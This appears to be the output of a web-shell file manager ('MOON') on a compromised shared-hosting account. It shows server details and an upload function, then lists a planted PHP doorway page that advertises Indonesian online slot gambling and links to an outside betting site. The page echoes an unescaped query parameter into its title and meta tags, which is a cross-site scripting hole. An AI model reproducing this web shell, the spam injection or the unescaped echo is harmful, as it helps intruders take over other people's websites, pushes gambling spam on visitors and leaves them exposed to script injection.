MOON
Server: Apache
System: Linux p3plzcpnl504823.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: pioneercabinetry (3950193)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: /home/pioneercabinetry/public_html/amp/index.php
<?php
  $q = isset($_GET['id']) ? $_GET['id'] : '';
  if (empty($q)) {
      echo "";
      exit;
  }
  $canonical = str_replace(' ', '-', $q);
  $brand = strtoupper($q);
  ?>



<!DOCTYPE html>
<html amp lang="en-ID">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title><?php echo $brand ?> # LiveUniverse Platform Live Streaming Interaktif untuk Bisnis Kreator dan Komunitas Digital</title>
    <link rel="shortcut icon" href="https://images.seeklogo.com/logo-png/27/2/ford-4x4-2008-logo-png_seeklogo-277054.png" />
    <meta name="description" content="<?php echo $brand ?> - Gunakan LiveUniverse untuk membangun pengalaman live streaming interaktif. Cocok untuk bisnis kreator dan komunitas digital yang ingin meningkatkan engagement dan interaksi secara real time" />
       <link rel="canonical" href="#" />
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    <style amp-boilerplate>
        body {
            -webkit-animation: -amp-start 8s steps(1, end) 0s 1 normal both;
            -moz-animation: -amp-start 8s steps(1, end) 0s 1 normal both;
            -ms-animation: -amp-start 8s steps(1, end) 0s 1 normal both;
            animation: -amp-start 8s steps(1, end) 0s 1 normal both
        }

        @-webkit-keyframes -amp-start {
            from { visibility: hidden }
            to { visibility: visible }
        }

        @-moz-keyframes -amp-start {
            from { visibility: hidden }
            to { visibility: visible }
        }

        @-ms-keyframes -amp-start {
            from { visibility: hidden }
            to { visibility: visible }
        }

        @-o-keyframes -amp-start {
            from { visibility: hidden }
            to { visibility: visible }
        }

        @keyframes -amp-start {
            from { visibility: hidden }
            to { visibility: visible }
        }
    </style>
    <noscript>
        <style amp-boilerplate>
            body {
                -webkit-animation: none;
                -moz-animation: none;
                -ms-animation: none;
                animation: none
            }
        </style>
    </noscript>

    <style amp-custom>
        :root {
            --neon-green: #ff1414;
            --fire-orange: #ff1100;
            --dark-bg: #0d0d0d;
            --gold-text: #ffcc00
        }

        body {
            background-color: var(--dark-bg);
            background-image: url('https://www.transparenttextures.com/patterns/asfalt-dark.png');
            font-family: 'Arial Black', sans-serif;
            color: #fff;
            margin: 0;
            padding: 0
        }

        .container {
            max-width: 420px;
            margin: 0 auto;
            padding: 15px;
            text-align: center
        }

        .logo-area {
            margin: 20px 0;
            perspective: 1000px
        }

        .logo-area .jp-badge {
            font-size: 10px;
            color: var(--neon-green);
            font-weight: 900;
            display: block;
            margin-bottom: 5px;
            text-shadow: 0 0 10px var(--neon-green);
            letter-spacing: 3px
        }

        .logo-area h1 {
            font-size: 32px;
            margin: 0;
            background: linear-gradient(to bottom, #fff 10%, var(--gold-text) 40%, var(--fire-orange) 100%);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
            filter: drop-shadow(4px 4px 0 #000);
            font-style: italic;
            letter-spacing: -1px;
            animation: skewText 3s infinite alternate ease-in-out
        }

        .logo-area .sub-title {
            display: inline-block;
            background: var(--neon-green);
            color: #000;
            font-size: 12px;
            font-weight: 900;
            padding: 4px 20px;
            margin-top: 5px;
            clip-path: polygon(5% 0, 100% 0, 95% 100%, 0 100%);
            box-shadow: 4px 4px 0 var(--fire-orange);
            letter-spacing: 1px
        }

        .banner-box {
            border: 3px solid var(--neon-green);
            box-shadow: 0 0 20px rgba(57, 255, 20, 0.3), 8px 8px 0 #000;
            margin-bottom: 25px;
            background: #000;
            line-height: 0;
            position: relative
        }

        .promo-bar {
            background: linear-gradient(90deg, #000, #222);
            color: var(--neon-green);
            padding: 10px;
            font-weight: 900;
            font-size: 14px;
            text-transform: uppercase;
            border-top: 3px solid var(--neon-green)
        }

        .btn-container {
            display: flex;
            flex-direction: column;
            gap: 15px
        }

        .btn-action {
            display: block;
            padding: 18px;
            font-size: 20px;
            font-weight: 900;
            text-decoration: none;
            border-radius: 4px;
            text-transform: uppercase;
            transition: .2s;
            position: relative;
            border: 2px solid #fff
        }

        .btn-login {
            background: linear-gradient(to right, var(--fire-orange), #f00);
            color: #fff;
            box-shadow: 6px 6px 0 var(--neon-green)
        }

        .btn-daftar {
            background: var(--neon-green);
            color: #000;
            box-shadow: 6px 6px 0 #fff
        }

        .btn-action:active {
            transform: translate(4px, 4px);
            box-shadow: 0 0 0 #000
        }

        .footer {
            margin-top: 35px;
            padding-bottom: 30px
        }

        .footer .copyright {
            background: #fff;
            color: #000;
            display: inline-block;
            padding: 6px 15px;
            font-weight: 900;
            font-size: 14px;
            text-transform: uppercase;
            transform: rotate(-2deg);
            border: 2px solid var(--neon-green);
            box-shadow: 5px 5px 0 var(--fire-orange)
        }

        .footer p {
            margin-top: 25px;
            font-size: 11px;
            color: var(--neon-green);
            letter-spacing: 1px;
            opacity: .9
        }

        @keyframes skewText {
            0% { transform: rotate(-1deg) skewX(-2deg) }
            100% { transform: rotate(1deg) skewX(2deg) }
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="logo-area">
            <span class="jp-badge">★ INDONESIA NO.1 ★</span>
            <h1>Sumber Duit</h1>
            <div class="sub-title">AGEN SLOT GACOR TERPERCAYA</div>
        </div>

        <div class="banner-box">
            <amp-img src="https://gitlab.com/goodsyall/gcrbet/-/raw/main/asdlmrlknlkg.jpg" width="700" height="700" layout="responsive" alt="SLOT GACOR"></amp-img>
            <div class="promo-bar">MUDAH JP - WITHDRAW TANPA BATAS</div>
        </div>

        <div class="btn-container">
            <a href="https://sausabcpedas.com/" class="btn-action btn-login">LOGIN SLOT GACOR</a>
            <a href="https://sausabcpedas.com/" class="btn-action btn-daftar">DAFTAR SLOT GACOR</a>
        </div>

        <div class="footer">
            <div class="copyright">©2026 SLOT GACOR</div>
            <p>Fair Play | No Robot | Anti Kalah</p>
        </div>
    </div>
</body>
</html>